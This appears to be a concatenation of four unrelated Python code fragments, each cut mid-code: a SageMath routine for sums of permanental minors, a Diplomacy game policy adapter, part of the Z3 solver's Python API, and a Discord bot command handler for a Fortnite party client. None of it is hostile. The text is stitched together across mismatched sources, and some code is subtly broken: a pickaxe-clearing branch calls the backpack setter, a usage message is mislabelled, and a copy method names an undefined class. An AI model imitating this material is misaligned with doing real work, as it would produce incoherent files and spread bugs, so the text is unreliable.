`p(\eta_{i_1}, \ldots, \eta_{i_k})` if we want to emphasize that some
monomials in the `\eta_i` are missing.
Introduce an "integration" operation `\langle p \rangle` over `R` and
`R[t]` consisting in the sum of the coefficients of the non-vanishing
monomials in `\eta_i` (i.e. the result of setting all variables `\eta_i`
to `1`). Let us emphasize that this is *not* a morphism of algebras as
`\langle \eta_1 \rangle^2 = 1` while `\langle \eta_1^2 \rangle = 0`!
Let us consider an example of computation.
Let `p_1 = 1 + t \eta_1 + t \eta_2` and
`p_2 = 1 + t \eta_1 + t \eta_3`. Then
.. MATH::
p_1 p_2 = 1 + 2t \eta_1 +
t (\eta_2 + \eta_3) +
t^2 (\eta_1 \eta_2 + \eta_1 \eta_3 + \eta_2 \eta_3)
and
.. MATH::
\langle p_1 p_2 \rangle = 1 + 4t + 3t^2
In this formalism, the permanent is just
.. MATH::
perm(A) = \langle \prod_{i=1}^n \sum_{j=1}^n A_{ij} \eta_j \rangle
A useful property of `\langle . \rangle` which makes this algorithm
efficient for band matrices is the following: let
`p_1(\eta_1, \ldots, \eta_n)` and `p_2(\eta_j, \ldots, \eta_n)` be
polynomials in `R[t]` where `j \ge 1`. Then one has
.. MATH::
\langle p_1(\eta_1, \ldots, \eta_n) p_2 \rangle =
\langle p_1(1, \ldots, 1, \eta_j, \ldots, \eta_n) p_2 \rangle
where `\eta_1,..,\eta_{j-1}` are replaced by `1` in `p_1`. Informally,
we can "integrate" these variables *before* performing the product. More
generally, if a monomial `\eta_i` is missing in one of the terms of a
product of two terms, then it can be integrated in the other term.
Now let us consider an `m \times n` matrix with `m \leq n`. The *sum of
permanental `k`-minors of `A`* is
.. MATH::
perm(A, k) = \sum_{r,c} perm(A_{r,c})
where the sum is over the `k`-subsets `r` of rows and `k`-subsets `c` of
columns and `A_{r,c}` is the submatrix obtained from `A` by keeping only
the rows `r` and columns `c`. Of course
`perm(A, \min(m,n)) = perm(A)` and note that `perm(A,1)` is just the sum
of all entries of the matrix.
The generating function of these sums of permanental minors is
.. MATH::
g(t) = \left\langle
\prod_{i=1}^m \left(1 + t \sum_{j=1}^n A_{ij} \eta_j\right)
\right\rangle
In fact the `t^k` coefficient of `g(t)` corresponds to choosing
`k` rows of `A`; `\eta_i` is associated to the i-th column;
nilpotency avoids having twice the same column in a product of `A`'s.
For more details, see the article [BP2015]_.
From a technical point of view, the product in
`K[\eta_1, \ldots, \eta_n][t]` is implemented as a subroutine in
:func:`prm_mul`. The indices of the rows and columns actually start at
`0`, so the variables are `\eta_0, \ldots, \eta_{n-1}`. Polynomials are
represented in dictionary form: to a variable `\eta_i` is associated
the key `2^i` (or in Python ``1 << i``). The keys associated to products
are obtained by considering the development in base `2`: to the monomial
`\eta_{i_1} \ldots \eta_{i_k}` is associated the key
`2^{i_1} + \ldots + 2^{i_k}`. So the product `\eta_1 \eta_2` corresponds
to the key `6 = (110)_2` while `\eta_0 \eta_3` has key `9 = (1001)_2`.
In particular all operations on monomials are implemented via bitwise
operations on the keys.
"""
if permanent_only:
prec = None
elif prec is not None:
prec = int(prec)
if prec == 0:
raise ValueError('the argument `prec` must be a positive integer')
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
K = PolynomialRing(A.base_ring(), var)
nrows = A.nrows()
ncols = A.ncols()
A = A.rows()
p = {0: K.one()}
t = K.gen()
vars_to_do = list(range(ncols))
for i in range(nrows):
# build the polynomial p1 = 1 + t sum A_{ij} eta_j
if permanent_only:
p1 | |
# ==============================================================================
# Copyright 2019 - <NAME>
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" OrderBased Policy Adapter
- Implements an instance of a policy adapter to connect to a order_based model
"""
from collections import OrderedDict
import logging
import numpy as np
from numpy.random import choice
from tornado import gen
from diplomacy_research.models.policy.base_policy_adapter import BasePolicyAdapter
from diplomacy_research.models.policy.base_policy_model import OrderProbTokenLogProbs, TRAINING_DECODER, \
GREEDY_DECODER, SAMPLE_DECODER
from diplomacy_research.models.policy.order_based.model import OrderBasedPolicyModel
from diplomacy_research.models.state_space import GO_ID, EOS_ID, PAD_ID, order_to_ix, ix_to_order, \
get_orderable_locs_for_powers
from diplomacy_research.proto.diplomacy_proto.common_pb2 import MapStringList
from diplomacy_research.utils.cluster import CompletedFuture, process_fetches_dict
from diplomacy_research.utils.model import logsumexp, apply_temperature, strip_keys, assert_normalized
# Constants
LOGGER = logging.getLogger(__name__)
class PolicyAdapter(BasePolicyAdapter):
""" Adapter to connect to an OrderBased model """
@staticmethod
def get_signature():
""" Returns the signature of all the possible calls using this adapter
Format: { method_signature_name: {'placeholders': {name: (value, numpy_dtype)},
'outputs': [output_name, output_name] } }
e.g. {'policy_evaluate': {'placeholders': {'decoder_type': ([SAMPLE_DECODER], np.uint8)},
'outputs: ['selected_tokens', 'log_probs', 'draw_prob']}}
"""
return {'policy_evaluate': {'placeholders': {'decoder_type': ([SAMPLE_DECODER], np.uint8)},
'outputs': ['selected_tokens',
'log_probs',
'draw_prob']},
'policy_beam_search': {'placeholders': {'decoder_type': ([GREEDY_DECODER], np.uint8)},
'outputs': ['beam_tokens',
'beam_log_probs',
'draw_prob']},
'policy_evaluate_with_state_value': {'placeholders': {'decoder_type': ([SAMPLE_DECODER], np.uint8)},
'outputs': ['selected_tokens',
'log_probs',
'draw_prob',
'state_value']},
'policy_beam_search_with_state_value': {'placeholders': {'decoder_type': ([GREEDY_DECODER], np.uint8)},
'outputs': ['beam_tokens',
'beam_log_probs',
'draw_prob',
'state_value']},
'policy_expand': {'placeholders': {'decoder_type': ([TRAINING_DECODER], np.uint8)},
'outputs': ['logits']},
'policy_log_probs': {'placeholders': {'decoder_type': ([TRAINING_DECODER], np.uint8)},
'outputs': ['log_probs', 'draw_prob']},
'policy_get_value': {'placeholders': {'decoder_type': ([GREEDY_DECODER], np.uint8)},
'outputs': ['state_value']}}
def tokenize(self, order):
""" Returns the tokens use by the adapter for a specific order """
return [order_to_ix(order) or PAD_ID]
def _decode_policy(self, locs, state_proto, power_name, phase_history_proto, possible_orders_proto, **kwargs):
""" Returns the output of the Policy Model decoder
:param locs: A list of locations for which we want orders
:param state_proto: A `.proto.game.State` representation of the state of the game.
:param power_name: The power name for which we want the orders and the state values
:param phase_history_proto: A list of `.proto.game.PhaseHistory`. This represents prev phases.
:param possible_orders_proto: A `proto.game.PossibleOrders` object representing possible order for each loc.
:param kwargs: Additional optional kwargs:
- player_seed: The seed to apply to the player to compute a deterministic mask.
- noise: The sigma of the additional noise to apply to the intermediate layers (i.e. sigma * epsilon)
- temperature: The temperature to apply to the logits. (Default to 0. for deterministic/greedy)
- dropout_rate: The amount of dropout to apply to the inputs/outputs of the decoder.
- with_state_value: Boolean that indicates to also query the value function.
- use_beam: Boolean that indicates that we want to use a beam search,
- retry_on_failure: Boolean that indicates to retry querying from the model if an error is encountered.
- prefetch: Boolean that indicates to return a dictionary of fetches (str: PrefetchedItem/Future)
- fetches: Dictionary of (str: future_results) that was computed with prefetch=True
:return: A future (fetches) to yield on.
"""
is_prefetching = kwargs.get('prefetch', False)
# No locations provided, we can return early
if not locs:
ret_val = None
return CompletedFuture(ret_val) if is_prefetching else ret_val
# Getting feedable item
feedable_item = self.feedable_dataset.get_feedable_item(locs,
state_proto,
power_name,
phase_history_proto,
possible_orders_proto,
**kwargs)
if not feedable_item:
LOGGER.warning('The method .get_feedable_item() did not return an item to feed to the model.')
LOGGER.warning('Make sure you have provided the correct locs and a list of possible orders')
ret_val = None
return CompletedFuture(ret_val) if is_prefetching else ret_val
# Queue
with_state_value = kwargs.get('with_state_value', False)
use_beam = kwargs.get('use_beam', False)
queue_name = {(False, False): 'policy_evaluate',
(False, True): 'policy_evaluate_with_state_value',
(True, False): 'policy_beam_search',
(True, True): 'policy_beam_search_with_state_value'}[(use_beam, with_state_value)]
return self.feedable_dataset.get_results(queue_name, feedable_item, **kwargs)
@staticmethod
def _process_fetches(decode_fetches):
""" Decodes the fetches returned by self._decode_policy()
:param decode_fetches: The fetches returned by self._decode_policy()
:return: An ordered dict with the location as key, and an OrderProbTokenLogProbs as value
"""
# If we get an empty list, we can't decode it
if not decode_fetches:
return decode_fetches
tokens, log_probs = decode_fetches[:2]
decoded_results = OrderBasedPolicyModel._decode(selected_tokens=np.array([tokens]), # pylint: disable=protected-access
log_probs=np.array([log_probs]))
return decoded_results['decoded_orders'][0]
@staticmethod
def _process_single_beam_fetches(decode_fetches, temperature=0.):
""" Decodes the beam fetches returned self._decode_policy() - This samples the beam to use based on a temp.
:param decode_fetches: The fetches returned by self._decode_policy()
:return: An ordered dict with the location as key, and an OrderProbTokenLogProbs as value
"""
# If we get an empty list, we can't decode it
if not decode_fetches:
return decode_fetches
beam_tokens, beam_log_probs = decode_fetches[:2]
# Computing probabilities after applying temperature
probs = np.exp(beam_log_probs - logsumexp(beam_log_probs))
adj_probs = apply_temperature(probs, temperature=temperature).tolist()
nb_probs = len(probs)
# Sampling according to probs
selected_beam_id = choice(range(nb_probs), p=assert_normalized(adj_probs))
# Decoding that specific beam
# Assigning probability mass equally over all orders in beam
selected_beam_tokens = np.array([beam_tokens[selected_beam_id]])
selected_beam_log_probs = np.zeros_like(selected_beam_tokens)
decoded_results = OrderBasedPolicyModel._decode(selected_tokens=selected_beam_tokens, # pylint: disable=protected-access
log_probs=selected_beam_log_probs)['decoded_orders'][0]
# Adjusting log probs to make it uniform over all locs
nb_locs = len(decoded_results)
adj_log_probs = beam_log_probs[selected_beam_id] / max(1, nb_locs)
decoded_results = {loc: OrderProbTokenLogProbs(order=decoded_results[loc].order,
probability=decoded_results[loc].probability,
log_probs=[adj_log_probs]) for loc in decoded_results}
return decoded_results
@gen.coroutine
def get_orders(self, locs, state_proto, power_name, phase_history_proto, possible_orders_proto, **kwargs):
""" Finds the orders to submit at each location given the current state
Orderings are calculated by defining an ordering and computing the next unit order conditioned on the
orders already selected
:param locs: A list of locations for which we want orders
:param state_proto: A `.proto.game.State` representation of the state of the game.
:param power_name: The power name for which we want the orders and the state values
:param phase_history_proto: A list of `.proto.game.PhaseHistory`. This represents prev phases.
:param possible_orders_proto: A `proto.game.PossibleOrders` object representing possible order for each loc.
:param kwargs: Additional optional kwargs:
- player_seed: The seed to apply to the player to compute a deterministic mask.
- noise: The sigma of the additional noise to apply to the intermediate layers (i.e. sigma * epsilon)
- temperature: The temperature to apply to the logits. (Default to 0. for deterministic/greedy)
- dropout_rate: The amount of dropout to apply to the inputs/outputs of the decoder.
- with_state_value: Boolean that indicates to also query the value function.
- use_beam: Boolean that indicates that we want to use a beam search, (Default; False)
- retry_on_failure: Boolean that indicates to retry querying from the model if an error is encountered.
- prefetch: Boolean that indicates to return a dictionary of fetches (str: PrefetchedItem/Future)
- fetches: Dictionary of (str: future_results) that was computed with prefetch=True
:return:
- if prefetch=True, a dictionary of fetches (key as string, value is a future (or list) to yield on)
- if prefetch=False and with_state_value=False (default), a tuple consisting of:
1) A list of the selected orders
2) The policy details ==> {'locs', 'tokens', 'log_probs', 'draw_action', 'draw_prob'}
- if prefetch=False and with_state_value=True, a tuple consisting of:
1) A list of the selected orders
2) The policy details ==> {'locs', 'tokens', 'log_probs', 'draw_action', 'draw_prob'}
3) The state value for the given state
"""
# Determining if we need to prefetch or postfetch
fetches = kwargs.get('fetches', {})
is_prefetching = kwargs.get('prefetch', False)
is_postfetching = fetches and not is_prefetching
fetch_prefix = 'get_orders'
with_state_value = kwargs.get('with_state_value', False)
# Getting fetches
if not is_postfetching:
locs = [loc[:3] for loc in locs]
# Running policy model
fetches['%s/decode_fetches' % fetch_prefix] = self._decode_policy(locs,
state_proto,
power_name,
phase_history_proto,
possible_orders_proto,
**kwargs)
# Prefetching - We only return the fetches
if is_prefetching:
return fetches
# Otherwise, we yield on the fetches
fetches = yield process_fetches_dict(self.feedable_dataset, fetches)
# Variables
selected_orders = []
policy_details = {'locs': [],
'tokens': [],
'log_probs': [],
'draw_action': False,
'draw_prob': 0.}
state_value = 0.
# Processing
decode_fetches = fetches['%s/decode_fetches' % fetch_prefix]
if decode_fetches is None:
return tuple([selected_orders, policy_details] + ([state_value] if with_state_value else []))
if kwargs.get('use_beam', False):
results = self._process_single_beam_fetches(decode_fetches, temperature=kwargs.get('temperature', 0.))
else:
results = self._process_fetches(decode_fetches)
# Building policy details based on returned locations
for loc in results:
order_prob_token_log_probs = results[loc]
# | |
self.ctx)
def accessor(self, i, j):
"""In Z3, each constructor has 0 or more accessor. The number of accessors is equal to the arity of the constructor.
>>> List = Datatype('List')
>>> List.declare('cons', ('car', IntSort()), ('cdr', List))
>>> List.declare('nil')
>>> List = List.create()
>>> List.num_constructors()
2
>>> List.constructor(0)
cons
>>> num_accs = List.constructor(0).arity()
>>> num_accs
2
>>> List.accessor(0, 0)
car
>>> List.accessor(0, 1)
cdr
>>> List.constructor(1)
nil
>>> num_accs = List.constructor(1).arity()
>>> num_accs
0
"""
if z3_debug():
_z3_assert(i < self.num_constructors(), "Invalid constructor index")
_z3_assert(j < self.constructor(i).arity(), "Invalid accessor index")
return FuncDeclRef(Z3_get_datatype_sort_constructor_accessor(self.ctx_ref(), self.ast, i, j), self.ctx)
class DatatypeRef(ExprRef):
"""Datatype expressions."""
def sort(self):
"""Return the datatype sort of the datatype expression `self`."""
return DatatypeSortRef(Z3_get_sort(self.ctx_ref(), self.as_ast()), self.ctx)
def TupleSort(name, sorts, ctx = None):
"""Create a named tuple sort base on a set of underlying sorts
Example:
>>> pair, mk_pair, (first, second) = TupleSort("pair", [IntSort(), StringSort()])
"""
tuple = Datatype(name, ctx)
projects = [ ('project%d' % i, sorts[i]) for i in range(len(sorts)) ]
tuple.declare(name, *projects)
tuple = tuple.create()
return tuple, tuple.constructor(0), [tuple.accessor(0, i) for i in range(len(sorts))]
def DisjointSum(name, sorts, ctx=None):
"""Create a named tagged union sort base on a set of underlying sorts
Example:
>>> sum, ((inject0, extract0), (inject1, extract1)) = DisjointSum("+", [IntSort(), StringSort()])
"""
sum = Datatype(name, ctx)
for i in range(len(sorts)):
sum.declare("inject%d" % i, ("project%d" % i, sorts[i]))
sum = sum.create()
return sum, [(sum.constructor(i), sum.accessor(i, 0)) for i in range(len(sorts))]
def EnumSort(name, values, ctx=None):
"""Return a new enumeration sort named `name` containing the given values.
The result is a pair (sort, list of constants).
Example:
>>> Color, (red, green, blue) = EnumSort('Color', ['red', 'green', 'blue'])
"""
if z3_debug():
_z3_assert(isinstance(name, str), "Name must be a string")
_z3_assert(all([isinstance(v, str) for v in values]), "Eumeration sort values must be strings")
_z3_assert(len(values) > 0, "At least one value expected")
ctx = _get_ctx(ctx)
num = len(values)
_val_names = (Symbol * num)()
for i in range(num):
_val_names[i] = to_symbol(values[i])
_values = (FuncDecl * num)()
_testers = (FuncDecl * num)()
name = to_symbol(name)
S = DatatypeSortRef(Z3_mk_enumeration_sort(ctx.ref(), name, num, _val_names, _values, _testers), ctx)
V = []
for i in range(num):
V.append(FuncDeclRef(_values[i], ctx))
V = [a() for a in V]
return S, V
#########################################
#
# Parameter Sets
#
#########################################
class ParamsRef:
"""Set of parameters used to configure Solvers, Tactics and Simplifiers in Z3.
Consider using the function `args2params` to create instances of this object.
"""
def __init__(self, ctx=None, params=None):
self.ctx = _get_ctx(ctx)
if params is None:
self.params = Z3_mk_params(self.ctx.ref())
else:
self.params = params
Z3_params_inc_ref(self.ctx.ref(), self.params)
def __deepcopy__(self, memo={}):
return ParamsRef(self.ctx, self.params)
def __del__(self):
if self.ctx.ref() is not None:
Z3_params_dec_ref(self.ctx.ref(), self.params)
def set(self, name, val):
"""Set parameter name with value val."""
if z3_debug():
_z3_assert(isinstance(name, str), "parameter name must be a string")
name_sym = to_symbol(name, self.ctx)
if isinstance(val, bool):
Z3_params_set_bool(self.ctx.ref(), self.params, name_sym, val)
elif _is_int(val):
Z3_params_set_uint(self.ctx.ref(), self.params, name_sym, val)
elif isinstance(val, float):
Z3_params_set_double(self.ctx.ref(), self.params, name_sym, val)
elif isinstance(val, str):
Z3_params_set_symbol(self.ctx.ref(), self.params, name_sym, to_symbol(val, self.ctx))
else:
if z3_debug():
_z3_assert(False, "invalid parameter value")
def __repr__(self):
return Z3_params_to_string(self.ctx.ref(), self.params)
def validate(self, ds):
_z3_assert(isinstance(ds, ParamDescrsRef), "parameter description set expected")
Z3_params_validate(self.ctx.ref(), self.params, ds.descr)
def args2params(arguments, keywords, ctx=None):
"""Convert python arguments into a Z3_params object.
A ':' is added to the keywords, and '_' is replaced with '-'
>>> args2params(['model', True, 'relevancy', 2], {'elim_and' : True})
(params model true relevancy 2 elim_and true)
"""
if z3_debug():
_z3_assert(len(arguments) % 2 == 0, "Argument list must have an even number of elements.")
prev = None
r = ParamsRef(ctx)
for a in arguments:
if prev is None:
prev = a
else:
r.set(prev, a)
prev = None
for k in keywords:
v = keywords[k]
r.set(k, v)
return r
class ParamDescrsRef:
"""Set of parameter descriptions for Solvers, Tactics and Simplifiers in Z3.
"""
def __init__(self, descr, ctx=None):
_z3_assert(isinstance(descr, ParamDescrs), "parameter description object expected")
self.ctx = _get_ctx(ctx)
self.descr = descr
Z3_param_descrs_inc_ref(self.ctx.ref(), self.descr)
def __deepcopy__(self, memo={}):
return ParamsDescrsRef(self.descr, self.ctx)
def __del__(self):
if self.ctx.ref() is not None:
Z3_param_descrs_dec_ref(self.ctx.ref(), self.descr)
def size(self):
"""Return the size of in the parameter description `self`.
"""
return int(Z3_param_descrs_size(self.ctx.ref(), self.descr))
def __len__(self):
"""Return the size of in the parameter description `self`.
"""
return self.size()
def get_name(self, i):
"""Return the i-th parameter name in the parameter description `self`.
"""
return _symbol2py(self.ctx, Z3_param_descrs_get_name(self.ctx.ref(), self.descr, i))
def get_kind(self, n):
"""Return the kind of the parameter named `n`.
"""
return Z3_param_descrs_get_kind(self.ctx.ref(), self.descr, to_symbol(n, self.ctx))
def get_documentation(self, n):
"""Return the documentation string of the parameter named `n`.
"""
return Z3_param_descrs_get_documentation(self.ctx.ref(), self.descr, to_symbol(n, self.ctx))
def __getitem__(self, arg):
if _is_int(arg):
return self.get_name(arg)
else:
return self.get_kind(arg)
def __repr__(self):
return Z3_param_descrs_to_string(self.ctx.ref(), self.descr)
#########################################
#
# Goals
#
#########################################
class Goal(Z3PPObject):
"""Goal is a collection of constraints we want to find a solution or show to be unsatisfiable (infeasible).
Goals are processed using Tactics. A Tactic transforms a goal into a set of subgoals.
A goal has a solution if one of its subgoals has a solution.
A goal is unsatisfiable if all subgoals are unsatisfiable.
"""
def __init__(self, models=True, unsat_cores=False, proofs=False, ctx=None, goal=None):
if z3_debug():
_z3_assert(goal is None or ctx is not None, "If goal is different from None, then ctx must be also different from None")
self.ctx = _get_ctx(ctx)
self.goal = goal
if self.goal is None:
self.goal = Z3_mk_goal(self.ctx.ref(), models, unsat_cores, proofs)
Z3_goal_inc_ref(self.ctx.ref(), self.goal)
def __deepcopy__(self, memo={}):
return Goal(False, False, False, self.ctx, self.goal)
def __del__(self):
if self.goal is not None and self.ctx.ref() is not None:
Z3_goal_dec_ref(self.ctx.ref(), self.goal)
def depth(self):
"""Return the depth of the goal `self`. The depth corresponds to the number of tactics applied to `self`.
>>> x, y = Ints('x y')
>>> g = Goal()
>>> g.add(x == 0, y >= x + 1)
>>> g.depth()
0
>>> r = Then('simplify', 'solve-eqs')(g)
>>> # r has 1 subgoal
>>> len(r)
1
>>> r[0].depth()
2
"""
return int(Z3_goal_depth(self.ctx.ref(), self.goal))
def inconsistent(self):
"""Return `True` if `self` contains the `False` constraints.
>>> x, y = Ints('x y')
>>> g = Goal()
>>> g.inconsistent()
False
>>> g.add(x == 0, x == 1)
>>> g
[x == 0, x == 1]
>>> g.inconsistent()
False
>>> g2 = Tactic('propagate-values')(g)[0]
>>> g2.inconsistent()
True
"""
return Z3_goal_inconsistent(self.ctx.ref(), self.goal)
def prec(self):
"""Return the precision (under-approximation, over-approximation, or precise) of the goal `self`.
>>> g = Goal()
>>> g.prec() == Z3_GOAL_PRECISE
True
>>> x, y = Ints('x y')
>>> g.add(x == y + 1)
>>> g.prec() == Z3_GOAL_PRECISE
True
>>> t = With(Tactic('add-bounds'), add_bound_lower=0, add_bound_upper=10)
>>> g2 = t(g)[0]
>>> g2
[x == y + 1, x <= 10, x >= 0, y <= 10, y >= 0]
>>> g2.prec() == Z3_GOAL_PRECISE
False
>>> g2.prec() == Z3_GOAL_UNDER
True
"""
return Z3_goal_precision(self.ctx.ref(), self.goal)
def precision(self):
"""Alias for `prec()`.
>>> g = Goal()
>>> g.precision() == Z3_GOAL_PRECISE
True
"""
return self.prec()
def size(self):
"""Return the number of constraints in the goal `self`.
>>> g = Goal()
>>> g.size()
0
>>> x, y = Ints('x y')
>>> g.add(x == 0, y > x)
>>> g.size()
2
"""
return int(Z3_goal_size(self.ctx.ref(), self.goal))
def __len__(self):
"""Return the number of constraints in the goal `self`.
>>> g = Goal()
>>> len(g)
0
>>> x, y = Ints('x y')
>>> g.add(x == 0, y > x)
>>> len(g)
2
"""
return self.size()
def get(self, i):
"""Return a constraint in the goal `self`.
>>> g = Goal()
>>> x, y = Ints('x y')
>>> g.add(x == 0, y > x)
>>> g.get(0)
x == 0
>>> g.get(1)
y > x
"""
return _to_expr_ref(Z3_goal_formula(self.ctx.ref(), self.goal, i), self.ctx)
def __getitem__(self, arg):
"""Return a constraint in the goal `self`.
>>> g = Goal()
>>> x, y = Ints('x y')
>>> g.add(x == 0, y > x)
>>> g[0]
x == 0
>>> g[1]
y > x
"""
if arg >= len(self):
raise IndexError
return self.get(arg)
def assert_exprs(self, *args):
"""Assert constraints into the goal.
>>> x = Int('x')
>>> g = Goal()
>>> g.assert_exprs(x > 0, x < 2)
>>> g
[x > 0, x < 2]
"""
args = _get_args(args)
s = BoolSort(self.ctx)
for arg in args:
arg = s.cast(arg)
Z3_goal_assert(self.ctx.ref(), self.goal, arg.as_ast())
def append(self, *args):
"""Add constraints.
| |
not the party leader!',
color = 0xff2929
))
return
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
for member in self.party.members:
if member.display_name.lower().startswith(args.lower()):
await self.party.hide(member)
await message.channel.send(embed=discord.Embed(
description = f'**{member.display_name}** is now **hidden**',
color = 0x349eeb
))
return
await message.channel.send(embed=discord.Embed(
description = 'No member with that name was found',
color = 0xff2929
))
return
else:
await message.channel.send(embed=discord.Embed(
description = 'Usage: `hide <member name>`',
color = 0x349eeb
))
return
if cmd[0].lower() == 'show':
if self.party.leader != self.party.me:
await message.channel.send(embed=discord.Embed(
description = 'I am not the party leader!',
color = 0xff2929
))
return
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
for member in self.party.members:
if member.display_name.lower().startswith(args.lower()):
await self.party.show(member)
await message.channel.send(embed=discord.Embed(
description = f'**{member.display_name}** is now **shown**',
color = 0x349eeb
))
return
await message.channel.send(embed=discord.Embed(
description = 'No member with that name was found',
color = 0xff2929
))
return
else:
await message.channel.send(embed=discord.Embed(
description = 'Usage: `hide <member name>`',
color = 0x349eeb
))
return
if cmd[0].lower() == 'match':
del cmd[0]
args = ' '.join(cmd)
if len(cmd) == 0:
await message.channel.send(embed=discord.Embed(
description = 'Usage: `match <0 to 255>`',
color = 0x349eeb
))
return
else:
try:
players_int = int(args.strip(' '))
if players_int < 0:
await message.channel.send(embed=discord.Embed(
description = 'The number can\'t be negative!',
color = 0x349eeb
))
return
elif players_int > 255:
await message.channel.send(embed=discord.Embed(
description = 'The number can\'t be more than 255!',
color = 0x349eeb
))
return
if self.in_match_timestamp == None:
self.in_match_timestamp = datetime.datetime.utcnow()
await self.party.me.set_in_match(players_left=players_int, started_at=self.in_match_timestamp)
await message.channel.send(embed=discord.Embed(
description = f'In-match state updated. {players_int} left',
color = 0x349eeb
))
return
except ValueError:
await message.channel.send(embed=discord.Embed(
description = 'Players in match must be a number between 0 and 255!',
color = 0x349eeb
))
return
except Exception as e:
await message.channel.send(embed=discord.Embed(
description = f'An uknown error ocurred: `{e}`',
color = 0x349eeb
))
traceback.print_exc()
return
if cmd[0].lower() == 'unmatch':
try:
self.in_match_timestamp = None
await self.party.me.clear_in_match()
await message.channel.send(embed=discord.Embed(
description = 'In-match state cleared.',
color = 0x349eeb
))
except Exception as e:
await message.channel.send(embed=discord.Embed(
description = f'An unknown error ocurred: {e}',
color = 0xff2929
))
if cmd[0].lower() == 'skin':
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
if cmd[0].lower().startswith('cid_'):
search = await self.cosmetics.get(type_='outfit', id_=args)
result = search
else:
search = await self.cosmetics.get(type_='outfit', name=args)
result = search[0] if len(search) > 0 else []
if len(result) != 0:
await self.party.me.edit_and_keep(partial(self.party.me.set_outfit, result['id']))
await message.channel.send(embed=discord.Embed(
title = 'Set outfit',
description = f'**Name:** {result["name"]}\n**ID:** {result["id"]}',
color = 0x349eeb
).set_thumbnail(url=result['images']['icon']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.outfit': result['id'], 'custom_account.outfit_variants': []}})
else:
await message.channel.send(embed=discord.Embed(
description = 'Nothing found',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower() == 'emote':
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
if cmd[0].lower().startswith('eid_'):
search = await self.cosmetics.get(type_='emote', id_=args)
result = search
else:
search = await self.cosmetics.get(type_='emote', name=args)
result = search[0] if len(search) > 0 else []
if len(result) != 0:
await self.party.me.clear_emote()
await self.party.me.edit_and_keep(partial(self.party.me.set_emote, result['id']))
await message.channel.send(embed=discord.Embed(
title = 'Set emote',
description = f'**Name:** {result["name"]}\n**ID:** {result["id"]}',
color = 0x349eeb
).set_thumbnail(url=result['images']['icon']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.emote': result['id']}})
else:
await message.channel.send(embed=discord.Embed(
description = 'Nothing found',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower() == 'backpack':
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
if args.lower() == 'clear':
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, 'bid_'))
await message.channel.send(embed=discord.Embed(
description = 'Cleared backpack',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.backpack': '', 'custom_account.backpack_variants': []}})
return
if cmd[0].lower().startswith('bid_'):
search = await self.cosmetics.get(type_='backpack', id_=args)
result = search
else:
search = await self.cosmetics.get(type_='backpack', name=args)
result = search[0] if len(search) > 0 else []
if len(result) != 0:
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, result['id']))
await message.channel.send(embed=discord.Embed(
title = 'Set backpack',
description = f'**Name:** {result["name"]}\n**ID:** {result["id"]}',
color = 0x349eeb
).set_thumbnail(url=result['images']['icon']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
else:
await message.channel.send(embed=discord.Embed(
description = 'Nothing found',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower() == 'pickaxe':
if len(cmd) != 1:
del cmd[0]
args = ' '.join(cmd)
if args.lower() == 'clear':
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, 'pickaxe_'))
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.pickaxe': '', 'custom_account.pickaxe_variants': []}})
await message.channel.send(embed=discord.Embed(
description = 'Cleared pickaxe',
color = 0x349eeb
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower().startswith('pickaxe_'):
search = await self.cosmetics.get(type_='pickaxe', id_=args)
result = search
else:
search = await self.cosmetics.get(type_='pickaxe', name=args)
result = search[0] if len(search) > 0 else []
if len(result) != 0:
await self.party.me.edit_and_keep(partial(self.party.me.set_pickaxe, result['id']))
await self.party.me.clear_emote() #in order to show the pickaxe
await self.party.me.set_emote(asset='EID_IceKing')
await message.channel.send(embed=discord.Embed(
title = 'Set pickaxe',
description = f'**Name:** {result["name"]}\n**ID:** {result["id"]}',
color = 0x349eeb
).set_thumbnail(url=result['images']['icon']).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if self.is_custom:
util.database.users.find_one_and_update({'user_id': self.message.author.id}, {'$set': {'custom_account.pickaxe': result['id'], 'custom_account.pickaxe_variants': []}})
else:
await message.channel.send(embed=discord.Embed(
description = 'Nothing found',
color = 0xff2929
).set_author(name=f'{self.user.display_name} - {self.session_id}', icon_url=await self.get_outfit_icon(self.party.me.outfit)))
if cmd[0].lower() == 'style':
del cmd[0]
args = ' '.join(cmd)
if len(cmd) == 0:
await message.channel.send(embed=discord.Embed(
